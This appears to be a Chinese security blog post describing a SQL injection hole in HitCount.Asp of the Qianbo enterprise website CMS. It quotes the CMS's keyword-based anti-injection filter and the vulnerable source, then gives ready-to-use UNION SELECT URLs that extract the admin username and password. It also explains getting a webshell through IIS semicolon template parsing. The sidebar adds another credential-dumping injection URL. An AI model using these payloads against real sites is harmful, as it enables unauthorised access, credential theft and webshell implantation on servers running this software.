千博企业网站管理系统HitCount.Asp页面注入漏洞

最新推荐文章于 2021-12-08 17:58:35 发布
最新推荐文章于 2021-12-08 17:58:35 发布
阅读量1.2k 收藏
点赞数
分类专栏: 提权 webshell 文章标签: javascript action sql shell each insert

程序都加入了防注入代码的,在NoSql.asp文件中7kccopyd-code

<%

If EnableStopInjection = True Then

Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr

Fy_In = "’|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"

Fy_Inf = Split(Fy_In, "|")

If Request.Form<>"" Then

For Each Fy_Post In Request.Form

For Fy_Xh = 0 To UBound(Fy_Inf)

If InStr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh))<>0 Then

Response.Write "<Script Language=’JavaScript’>alert(’警告:参数非法!’);</Script>"

Response.End

End If

Next

Next

End If

If Request.QueryString<>"" Then

For Each Fy_Get In Request.QueryString

For Fy_Xh = 0 To UBound(Fy_Inf)

If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh))<>0 Then

Response.Write "<Script Language=’JavaScript’>alert(’警告:参数非法!’);</Script>"

Response.End

Response.End

End If

Next

Next

End If

End If

%>
没有过滤cookie,不过程序在对变量传入时都限制了整型的,所以我也没办法。

继续看。

MemberLogin.Asp这个文件

Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, sql

LoginName = Trim(request.Form("LoginName"))

LoginPassword = Md5(request.Form("LoginPassword"))

Set rs = server.CreateObject("adodb.recordset")

sql = "select * from Qianbo_Members where MemName=’"&LoginName&"’"

没有加入防注入代码,不过却是登录验证页面,如果是MSsql数据库我们还好办点。

这个时候,在HitCount.Asp这个文件里发现,文件没有调用防注入代码

<%

Dim rs, m_SQL

Dim m_ID

m_ID = ReplaceBadChar(Request.QueryString("id"))

m_LX = ReplaceBadChar(Request.QueryString("LX"))

action = ReplaceBadChar(Request.QueryString("action"))

If action = "count" Then

conn.Execute("update "&m_LX&" set ClickNumber = ClickNumber + 1 where ID=" & m_ID & "")

Else

m_SQL = "select ClickNumber from "&m_LX&" where ID=" & m_ID

Set rs = conn.Execute(m_SQL)

response.Write "document.write("&rs(0)&");"

rs.Close

Set rs = Nothing

End If

%>
就是这个文件了。我们来构造注入语句

如下:

获取管理密码:

http://www.webshell.cc/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20password%20from%20qianbo_admin

 

获取管理帐号:

http://www.webshell.cc/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20adminname%20from%20qianbo_admin

找后台就访问http://www.webshell.cc/sitemap.xml吧!

拿SHELL:

IIS的asp;分号解析漏洞还是害了不少人,千博企业网站管理系统.后台拿SHELL依旧是修改模板*.asp;*生成。

fengling132
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
企业网站管理系统免费开源版 v2010 Build 0418-ASP源码.zip
01-21
ASP源码,压缩包解压密码:www.cqlsoft.com
企业网站管理旗舰版ASP源码
03-10
企业网站管理旗舰版ASP源码,无加密。
某款asp的cms程序注射漏洞
一生无悔惜缘的博客
08-04 1625
简要描述: 谷歌百度搜索关键词 inurl:HomeMarket.asp 在域名后面加上以下代码能爆破出管理帐号密码/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%2
页面浏览统计之(一) hitcount
weixin_30390075的博客
10-01 965
转:http://www.codingsoho.com/zh/blog/component-hitcount/ hit counter是用来计数模型对象的访问次数的。 Django hit counter application that tracks the number of hits/views for chosen objects. https://github.com/thornom...
ASP企业招聘管理系统
02-21
6. `HitCount.Asp`:通常用于统计页面访问量,这有助于分析哪些职位更受欢迎,或者系统整体的活跃度如何。 7. `Top.Asp`:这可能是网站的顶部导航栏,包含网站的主要链接和功能入口,如首页、招聘职位、关于我们等...
Python库 | django-hitcount-1.2.4.tar.gz
03-02
`django-hitcount`是一个用于Django项目的扩展库,它允许开发者轻松地跟踪和统计网站页面的访问量。这个资源是`django-hitcount`的1.2.4版本,打包为`.tar.gz`压缩文件,通常用于在本地环境中安装和使用。 **Django...
Linux主机防CC攻击的方法.pdf
09-06
1. RedHat6 系列 Linux 上的“--hitcount”值默认为 20,而 Debian、RedHat7 系列没有此限制。 2. xt_recent 模块的“ip_pkt_list_tot”值可以通过添加配置文件修改,但需要小心避免内核恐慌状态(kernel panic)。 ...
HitCount-crx插件
04-03
hitcount是一个流量交换服务,它自动为您的网站提供免费流量。 hitcount为您做什么?您有一个网站,但没有足够的访客(流量)到您的网站HitCount是一个流量交换服务,可以将流量获取到您的网站。你可以通过冲浪...
aws-hitcount
02-25
AWS HitCount目标:在AWS中,在Django中设置页面点击计数器。 这些Terraform脚本将部署一个AWS负载均衡器,自动伸缩组和EC2实例来托管我们的Django应用程序。 然后,Ansible剧本将部署Django应用程序。 注意:仅供应...
ASP+HTML5自适应企业网站系统 v2018 Build0918
10-09
自适应企业网站系统是以asp+access进行开发的html5自适应企业网站源码。 软件简介: 1、简单易用的后台操作页面,让网站管理更简单高效,尊享更好的用户体验。 2、功能强大灵活
ACT网站管理系统 4.0
04-25
ACTCMS是一款具有强大的功能的基于ASP语言的开源内容管理软件,有UTF-8和GB2312两个编码版本,支持ACCESS和MSSQL两种数据库。ACTCMS是一款完全开源的程序,都毫无保留的完全开放源代码,用户不需额外安装其他DLL组件,其最大的特点是易用, ACTCMS.搭积木式的网站建设. 系统自带三大模型,系统模型,注册模型.表单模型.让你无顾虑制作属于自己的特色网站 国内目前为止ASPCMS中唯一支持注册模型的CMS 加入函数接口,如果对ASP熟悉一点的.您还可以自己编写函数.来和系统融合.直接调用系统函数,4.0新增自定义表单将提交结果发送到邮箱,专题功能,在线主题,可以轻松下载在线模版 在线插件,心情指数,特别针对SEO优化的内部链接功能 支持伪静态功能,在线主题功能.让新手站长不会标签就可以制作网站
拿站完整过程
11-15
一个完整的拿站过程,目标网站-后台地址-后面账户密码-无漏洞- 寻旁注
企业网站管理系统个人Access版 v2012 Build0319 集成环境版
10-26
企业网站管理系统个人版免费下载、免费使用、功能无限制,完全免费拥有(请尊重开发者版权,保留首页底部版权显示):内含Flash动画源码、Access数据库程序包、SQL数据库程序包。千企业网站管理系统个人版2012.3.19更新1.修正后台生成静态页面函数;2.增加集成环境以方便用户本地调试、体验。千企业网站管理系统个人版:免费下载、免费使用、功能无限制。完全免费拥有(请尊重开发者版权,保留首页底部版权显示):内含Flash动画源码、Access数据库程序包、SQL数据库程序包。全站模块化操作,静态标签调用,更强扩展性…千企业网站系统个人版是一套基于.Net + Access(SQL)建站管理系统软件、不依赖于服务商特定空间、不需安装任何空间商组件、独创“网站模板与网站程序完全分离”全新的概念,让网站的模板设计与程序彻底分开、快速搭建网站平台、经过完善设计是专门为中国市场量身定做的一套适合个人、企业、政府和行业网站、内部知识网站、电子商务网站,精心设计的架构与功能体制,为您提供一个安全、高效、全新、快速、优秀的各种网站解决方案。千企业网站系统个人版能为您的想法实现些什么?电子
ACTCMS管理系统 注入漏洞
weixin_33862514的博客
03-14 1386
摘自 末日 的Qzone (华盟版主) 漏洞描述: User_Article.Asp导致注入,暴出管理员密码。 利用方法:http://localhost/User/User_Article.Asp?ModeID=1action=addsclassid=-1’%20union%20select%201,2,3,4,5,admin_name%2B’|’%2Bpa...
漏洞分析】Heartbleed 2014-0160漏洞Poc及规则分析
Walter的专栏
08-05 3063
HeartBleed Poc脚本 1、发送client hello接收serverhello 之后发送心跳再解析获取的数据信息 2、发送client hello时直接带上心跳消息,然后解析服务器返回信息#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@js
厉害了,上次我见过这么厉害的安全测试实战还是上次
Androidyuexia的博客
12-08 826
01概念介绍 1.1 xss XSS 攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是 JavaScript,但实际上也可以包括 Java、 VBScript、ActiveX、 Flash 或者甚至是普通的 HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和 cookie 等各种内容。 参考资料:百度百科 1.2 pr 提权 PR 提权利用 Win
web渗透测试练习——熊海cms V1.0
王嘟嘟的博客
11-21 7811
0x00 前言 做一次渗透测试的练习。以及对思路进行一个总结。 0x01 start 我就随便写一点记录和笔记吧。 1.过程 首先拿到这个网站了之后,打开页面 然后第一个想法就是丢到AWVS里扫一扫,然后就挂着扫吧。 加一个 admin试试 后台到手,请忽略我之前登录尝试的东西。 随便点一点 一般我看到这种有数字的,第一个想法就是丢到sqlmap跑一跑。让它去跑吧。 然后加一个单引号试试 ...
1.设置规则步长5,配置192.168.10.0/24不允许访问PC3的HTTP服务,
最新发布
06-09
可以通过以下规则实现: 1. 允许192.168.10.0/24网段访问PC3的除HTTP服务外的所有服务: ```iptables -A INPUT -s 192.168.10.0/24 -d <PC3_IP> -p tcp -m multiport ! --dports 80,8080 -j ACCEPT``` 2. 禁止192.168.10.0/24网段访问PC3的HTTP服务: ```iptables -A INPUT -s 192.168.10.0/24 -d <PC3_IP> -p tcp -m multiport --dports 80,8080 -m state --state NEW -m recent --set --name HTTP --rsource``` ```iptables -A INPUT -s 192.168.10.0/24 -d <PC3_IP> -p tcp -m multiport --dports 80,8080 -m state --state NEW -m recent --update --seconds 60 --hitcount 3 --rttl --name HTTP --rsource -j DROP``` 这里假设PC3的IP地址为<PC3_IP>,HTTP服务使用的端口为80和8080。第一条规则允许192.168.10.0/24网段访问除HTTP服务外的所有服务,第二条规则禁止192.168.10.0/24网段访问PC3的HTTP服务,并设置一个60秒的时间窗口和3个连接数限制,超过限制的连接将被丢弃。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值